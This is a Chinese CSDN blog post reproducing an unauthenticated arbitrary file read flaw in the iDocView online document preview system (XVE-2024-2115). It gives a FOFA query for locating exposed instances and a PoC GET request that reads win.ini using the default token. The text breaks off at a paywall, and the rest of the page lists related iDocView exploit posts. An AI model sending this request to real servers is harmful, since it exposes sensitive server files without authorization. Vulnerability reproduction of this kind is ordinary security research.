I Doc View 在线文档预览 qJvqhFt.json 任意文件读取漏洞复现(XVE-2024-2115)

已于 2024-06-06 15:14:48 修改
阅读量583 收藏
点赞数 4
分类专栏: 漏洞复现 文章标签: web安全 安全
于 2024-06-06 15:14:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/139501189
版权

0x01 产品简介

iDocView是一个在线文档解析应用,旨在提供便捷的文件查看和编辑服务。

0x02 漏洞概述

iDocView是一个在线文档预览系统 /view/qJvqhFt.json 接口处存在任意文件读取漏洞,未授权的攻击者可以利用此接口并携带默认token读取服务器敏感文件信息,使系统处于极度不安全的状态。

0x03 复现环境

FOFA:title=="在线文档预览 - I Doc View"

0x04 漏洞复现

PoC

GET /view/qJvqhFt.json?start=1&size=5&url=file%3A%2F%2F%2FC%3A%2Fwindows%2Fwin.ini&idocv_auth=sapi HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Sa
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 4
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
I Doc View在线文档预览系统任意文件读取漏洞复现
0xSec
12-14 1338
iDocView是一个在线文档预览系统 /doc/upload 接口处存在任意文件读取漏洞,未授权的攻击者可以利用此接口并携带默认token读取服务器敏感文件信息,使系统处于极度不安全的状态。
漏洞复现-iDocview某接口存在任意文件读取漏洞(附漏洞检测脚本)
jjjj1029056414的博客
12-14 663
漏洞复现-iDocview某接口存在任意文件读取漏洞,附带自己写的poc脚本
漏洞复现】I Doc View在线文档预览任意文件读取 1day
失心少年
12-14 588
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!I Doc View在线文档预览是一款在线文档预览系统,可以实现文档预览文档协作编辑功能。其存在代码执行漏洞,使得攻击者可以通过利用这个接口,触发服务器下载并解析恶意文件,从而导致远程命令执行漏洞
I Doc View 多个高危漏洞复现
fly夏天的博客
12-18 904
I Doc View 多个漏洞复现
漏洞复现」I Doc View 在线文档预览 qJvqhFt.json 任意文件读取漏洞(XVE-2024-2115)
最新发布
qq_39894062的博客
06-13 742
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
Nowzen.gaM5xVe
03-18
"Nowzen.gaM5xVe"看起来可能是一个特定项目或文件的命名,但没有足够的上下文来详细解释其含义。不过,我们可以深入探讨HTML的基本概念和关键知识点。 1. **HTML结构**:HTML文档通常以`<!DOCTYPE html>`开始,声明...
迅雷看看xv文件转换器XVE 第7版
09-27
迅雷看看xv文件转换器XVE是一款专为处理迅雷看看播放器特有的.xv格式视频文件而设计的工具。该软件的第7版引入了批量操作功能,使得用户可以一次性转换多个.xv文件,极大地提高了效率,尤其适用于需要处理大量这类...
xvb .xv文件转flv
02-13
1. **读取.xv文件**:`XVE.exe`读取.xv文件的内容,解析其内部结构和编码信息。 2. **解码过程**:解码器将.xv文件的编码数据转换为可理解的图像和音频帧。 3. **转码**:根据`.flv`的编码规范,将解码后的数据重新...
XVE提取工具
02-21
这允许用户访问和操作原本被封装在XVE文件中的任何元素,如系统镜像、应用程序文件、配置文档等。 2. **虚拟机迁移**:在虚拟化环境中,XVE文件常用于虚拟机的备份和迁移。XVE提取工具可以帮助用户将一个虚拟机实例...
超级文件资源管理器X v1.2.1官方版
12-18
为您提供超级文件资源管理器X下载,超级文件资源管理器X是一款多标签页的文件管理工具,支持标签页,让文件管理更简单,更省心,归类显示,AI操作感知,在处理文件时更高效!软件特色 1.支持多标签页 多标签页,让...
DocViewer(文档查看器)1.0.7免费绿色版
07-25
DocViewer可以快速查看各种帮助系统格式-iOSHELP、 AndroidHelp、 Xamlhelp、 SilverlightHelp 和 PhoneHelp,软件界面干净简洁,是用户办公的得力助手,需要的朋友快来下载使用吧。
I Doc View在线文档预览系统RCE漏洞复现(QVD-2023-45061)
0xSec
11-23 2431
远程未经身份验证的攻击者可通过构造特殊请求,目标应用将下载恶意文件,成功利用此漏洞可能在目标服务器上执行任意代码。
漏洞分析 | iDocView在线文档预览系统远程代码执行漏洞
WangsuSecurity的博客
12-20 1036
近期,网宿安全演武实验室监测到iDocView存在远程代码执行漏洞:远程攻击者可以利用该漏洞让目标应用下载恶意文件,最终获取服务器权限。
I Doc View在线文档预览系统 cmd.json RCE漏洞复现
0xSec
12-24 1146
I Doc View在线文档预览系统 cmd.json 接口处存在命令执行漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
I Doc View在线文档预览系统cms.json存在RCE漏洞
3tefanie丶zhou的博客
12-15 468
【须知少时凌云志,曾许人间第一流。】
IDocView 前台RCE(XVE-2023-23743)漏洞复现
m0_64366018的博客
01-12 497
title=="在线文档预览 - I Doc View"
漏洞复现】I Doc View 在线文档预览 qJvqhFt.json 任意文件读取漏洞(XVE-2024-2115)
siu~
06-06 441
iDocView是一个在线文档预览系统 /iew/gJvghftjson 接口处存在任意文件读取漏洞,未授权的攻击者可以利用此接口并携带默认token读取服务器敏感文件信息,使系统处于极度不安全的状态。
【1day】复现I Doc View系统upload接口任意文件读取漏洞
记录并分享学习安全的知识点..
12-11 1461
IDocV是一家跨国在线文档预览服务公司,为用户提供文档预览的功能。该公司提供第三方API,使开发者能够将其文档预览服务集成到自己的应用程序中。I Doc View系统upload接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中敏感文件
IDocView 前台RCE漏洞分析
2301_80115097的博客
11-23 332
IDocView是一款能够提供在线文档预览、压缩文件预览、图纸预览、图片预览、音视频播放、协作编辑、同步展示Web应用,其html/2word存在远程代码执行漏洞才疏学浅,如有什么问题,希望各位师傅多多指正,欢迎大家一起交流,学习经验。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值